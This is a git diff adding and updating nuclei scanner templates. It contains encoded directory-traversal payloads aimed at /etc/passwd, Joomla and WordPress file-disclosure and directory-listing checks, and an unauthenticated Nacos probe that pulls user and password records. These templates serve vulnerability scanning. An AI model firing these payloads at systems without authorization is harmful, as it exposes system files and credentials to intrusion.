diff --git a/README.md b/README.md index c7838f77a8..9cedaad55e 100644 --- a/README.md +++ b/README.md @@ -45,6 +45,7 @@ An overview of the nuclei template directory including number of templates assoc **63 directories, 609 files**. + diff --git a/fuzzing/directory-traversal.yaml b/fuzzing/directory-traversal.yaml index df2f9d7d23..7c44cee4cc 100644 --- a/fuzzing/directory-traversal.yaml +++ b/fuzzing/directory-traversal.yaml @@ -24,6 +24,13 @@ requests: - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/./../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd" + - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd" + - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" + - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd" + - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" + matchers-condition: and matchers: - type: status diff --git a/miscellaneous/joomla-htaccess.yaml b/miscellaneous/joomla-htaccess.yaml new file mode 100644 index 0000000000..cbaf0cf796 --- /dev/null +++ b/miscellaneous/joomla-htaccess.yaml @@ -0,0 +1,29 @@ +id: joomla-htaccess-file + +info: + name: Joomla htaccess file disclosure + author: oppsec + severity: info + description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc... + +requests: + - method: GET + path: + - "{{BaseURL}}/htaccess.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "# @package Joomla" + - "Open Source Matters. All rights reserved" + condition: and + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 diff --git a/miscellaneous/joomla-manifest-file.yaml b/miscellaneous/joomla-manifest-file.yaml new file mode 100644 index 0000000000..6195def552 --- /dev/null +++ b/miscellaneous/joomla-manifest-file.yaml @@ -0,0 +1,29 @@ +id: joomla-manifest-file + +info: + name: Joomla manifest file disclosure + author: oppsec + severity: info + description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths. + +requests: + - method: GET + path: + - "{{BaseURL}}/administrator/manifests/files/joomla.xml" + + matchers-condition: and + matchers: + - type: word + words: + - "admin@joomla.org" + - "www.joomla.org" + condition: and + + - type: word + words: + - "application/xml" + part: header + + - type: status + status: + - 200 diff --git a/misconfiguration/unauthenticated-airflow.yaml b/misconfiguration/unauthenticated-airflow.yaml index 4db232a58f..1c14b4f895 100644 --- a/misconfiguration/unauthenticated-airflow.yaml +++ b/misconfiguration/unauthenticated-airflow.yaml @@ -14,9 +14,15 @@ requests: matchers: - type: word words: - - Airflow - DAGs + - "Content-Type: text/html" + part: header + + - type: word + words: + - "Airflow - DAGs" part: body + condition: and - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/misconfiguration/unauthenticated-nacos-access.yaml b/misconfiguration/unauthenticated-nacos-access.yaml index 516f1b6254..35e0b30cdc 100644 --- a/misconfiguration/unauthenticated-nacos-access.yaml +++ b/misconfiguration/unauthenticated-nacos-access.yaml @@ -1,30 +1,34 @@ id: unauthenticated-nacos-access info: - name: Unauthenticated Nacos access - author: taielab + name: Unauthenticated Nacos access v1.x + author: taielab & @pikpikcu severity: critical - - # References: - # - https://github.com/alibaba/nacos/issues/4593 + issues: https://github.com/alibaba/nacos/issues/4593 requests: - - raw: - - | - GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1 - Host: {{Hostname}} - User-Agent: Nacos-Server - Content-Length: 2 + - method: GET + path: + - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9" + - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" + headers: + User-Agent: Nacos-Server matchers-condition: and matchers: + + - type: word + words: + - "Content-Type: application/json" + part: header + - type: regex regex: - '"username":' - '"password":' - - '"totalCount":' - condition: and part: body + condition: and + - type: status status: - 200 diff --git a/vulnerabilities/wordpress/wordpress-user-enumeration.yaml b/vulnerabilities/wordpress/wordpress-user-enumeration.yaml index f109bebade..c06644e07a 100644 --- a/vulnerabilities/wordpress/wordpress-user-enumeration.yaml +++ b/vulnerabilities/wordpress/wordpress-user-enumeration.yaml @@ -2,7 +2,7 @@ id: wordpress-user-enumeration info: name: Wordpress user enumeration - author: Manas_Harsh + author: Manas_Harsh & daffainfo severity: info tags: wordpress @@ -10,6 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/users/" + - "{{BaseURL}}/?rest_route=/wp/v2/users/" matchers-condition: and matchers: - type: status diff --git a/miscellaneous/wp-license.yaml b/vulnerabilities/wordpress/wp-license-file.yaml similarity index 94% rename from miscellaneous/wp-license.yaml rename to vulnerabilities/wordpress/wp-license-file.yaml index 35ab078af8..f2ee4bbc05 100644 --- a/miscellaneous/wp-license.yaml +++ b/vulnerabilities/wordpress/wp-license-file.yaml @@ -1,4 +1,4 @@ -id: wp-license +id: wp-license-file info: name: WordPress license file disclosure diff --git a/vulnerabilities/wordpress/wp-uploads-listing.yaml b/vulnerabilities/wordpress/wp-uploads-listing.yaml new file mode 100644 index 0000000000..bc2f614fd8 --- /dev/null +++ b/vulnerabilities/wordpress/wp-uploads-listing.yaml @@ -0,0 +1,31 @@ +id: wp-uploads-listing + +info: + name: WordPress Upload Directory Listing Enable + author: yashgoti + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/" + - "{{BaseURL}}/wp-content/uploads/2015/" + - "{{BaseURL}}/wp-content/uploads/2016/" + - "{{BaseURL}}/wp-content/uploads/2017/" + - "{{BaseURL}}/wp-content/uploads/2018/" + - "{{BaseURL}}/wp-content/uploads/2019/" + - "{{BaseURL}}/wp-content/uploads/2020/" + - "{{BaseURL}}/wp-content/uploads/2021/" + - "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/" + matchers-condition: and + matchers: + - type: word + words: + - "Directory listing for" + - "Index of /" + - "[To Parent Directory]" + - "Directory: /" + + - type: status + status: + - 200 diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 71d5dc5a5e..36be8a7c7b 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -44,3 +44,5 @@ workflows: - template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml - template: vulnerabilities/wordpress/wp-enabled-registration.yaml - template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml + - template: vulnerabilities/wordpress/wp-uploads-listing.yaml + - template: vulnerabilities/wordpress/wp-license-file.yaml